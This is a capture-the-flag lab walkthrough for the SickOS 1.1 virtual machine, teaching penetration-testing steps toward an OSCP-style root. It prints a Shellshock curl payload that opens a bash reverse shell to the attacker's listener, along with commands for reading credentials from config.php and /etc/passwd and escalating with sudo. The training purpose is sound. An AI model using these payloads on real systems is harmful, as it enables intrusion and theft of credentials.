Lab - Capture the Flag Walkthrough – SickOS 1.

Overview

In this lab, you will be shown how to gain root access to a virtual machine designed as a
Capture the Flag (CTF) exercise. This CTF is rated as easy. These walk-throughs are designed
so students can learn by emulating the technical guidelines used in conducting an actual real-
world pentest using as few automated tools as possible.

This CTF is similar to the labs found in the OSCP exam course. The objective is to compromise
the target and gain Administrative/root privileges. This CTF will incorporate manual hacking
techniques whenever possible. The use of any automated tools has been kept to an absolute
minimum.

Caveat

VirtualBox was used to run the target machine. Kali Linux is the attacker machine for solving
this CTF.

The SickOS 1.1 OVA file can be downloaded here.

CTF Description

Difficulty: Easy

Flags: There is one flag

DHCP: Enabled
IP Address: Automatically assigned

Footprinting

We begin by conducting an active scan of the network. First, we identify our and then to scan
the target for any open ports or exploitable services.

Command used: netdiscover -i eth0

My target has an IP address of 192.168.0.102, and my Kali has an IP address of 192.168.0.30.

These addresses to apply to me and my network, yours will probably differ.

1
© 2018 syberoffense.com All Rights Reserved
We next need to fingerprint the target to learn what ports and services are available. For this,
we can run Nmap against the target.

Command used: nmap -sS -A -n -T5 192.168.0.102

The nmap scan shows a Squid HTTP Proxy configured on port 3128 and that HTTP running on
port 8080 is closed. Having HTTP present tells us there is most probably a website presence.

We can configure Nikto with the proxy switch to look for any vulnerabilities on the web server.
Command used: nikto -h 192.168.0.102 -useproxy http://192.168.0.102:3128

2
© 2018 syberoffense.com All Rights Reserved
We the server is vulnerable to the Shellshock vulnerability. Shellshock is a bug that uses a
vulnerability in the common Unix command execution shell bash (Bourne-Again SHell) to
potentially enable hackers to take control of the machine and remotely execute arbitrary code
directly into the system.

To get access to the website, we will need to configure the proxy settings of our Firefox
browser in Kali. Launch Firefox and go to Edit> Preferences>Network Proxy > Settings>.

Once you click OK and save the proxy settings, in the address bar, type in the IP address of the
target and are given the home page for the website.

3
© 2018 syberoffense.com All Rights Reserved
Let’s check the source code for any useful information. Nothing of use here.

From our Nikto scan, we learned of a robots.txt file. Let’s look at that.

We learn there is a wolfcms page. Let’s check that out.

Examination of Wolfcms turns of nothing useful. We can now run the exploit Shellshock -
CVE-2014-6271 and CVE-2014-6278 against the site. Doing so will allow us to establish a
reverse shell. Leave the listener up and running.

4
© 2018 syberoffense.com All Rights Reserved
Command used: nc -lvnp 4444

From our Kali machine, we open a second terminal and run the following cURL command
from the following command.

Note: this command is configured with my target and Kali IP information, your IP information
will probably differ.

Command used: curl -x http://192.168.0.102:3128 -H "User-Agent: ()

{ ignored;};/bin/bash -i >& /dev/tcp/192.168.0.30/4444 0>&1"
http://192.168.0.102/cgi-bin/status

Reverse shell is established!

Break down of the command:

We used the -x switch to initiate a connection using our HTTP Proxy. We then used the -H
switch to include an edited User-Agent header. The code we executed was a reverse TCP bash
shell.

We next need to change location over to wolfcms folder and then list the contents to see what
we can find.

Command used: cd /var/www/wolfcms

Command used: ls

5
© 2018 syberoffense.com All Rights Reserved
Our target of interest here is the config.php file and its contents. We can view the contents
using the cat command.

Command used: cat config.php

We get a user name and password for SQL access.

We open new terminal and attempt to get access to the SQL database, but the connection does
not happen. We return to the reverse shell and use the cat command to print out the contents of
the etc/passwd file.

Command used: mysql -h 192.168.0.102 -P 3306 -u root -p wolf

Command used: cat /etc/passwd

6
© 2018 syberoffense.com All Rights Reserved
We see the user sickos. We open a new terminal and attempt to establish a ssh shell using the
user sickos and the password we found earlier, john@123.

Open a second terminal and attempt to login to the target machine using ssh.

Command used: ssh [email protected]

Let’s see what kind of permissions sickos has.

Command used: sudo -l

Sickos has root permissions.

7
© 2018 syberoffense.com All Rights Reserved
Let’s access root on the target as sickos.

Command used: sudo su

Change directory over to root.

Command used: cd /root

Let’s list the directory contents and see what permissions that have.

Let’s cat out the contents of the a0216ea4d51874464078c618298b1367.txt file.

And we have captured the flag!

8
© 2018 syberoffense.com All Rights Reserved
Summary –

We captured this flag is short order. This CTF was easy, and it provided us some good insight
into how the OSCP labs are structured.

The biggest take away was learning about the Shellshock vulnerability and how to exploit it.

Methodology Used:

 Network Scanning (Netdiscover, Nmap)

 Configure browser proxy
 Use robot.txt
 Steal password from inside config.php
 Open etc/passwd and find user name
 Switch user (su)
 Take root access

Regards –

Prof. k

9
© 2018 syberoffense.com All Rights Reserved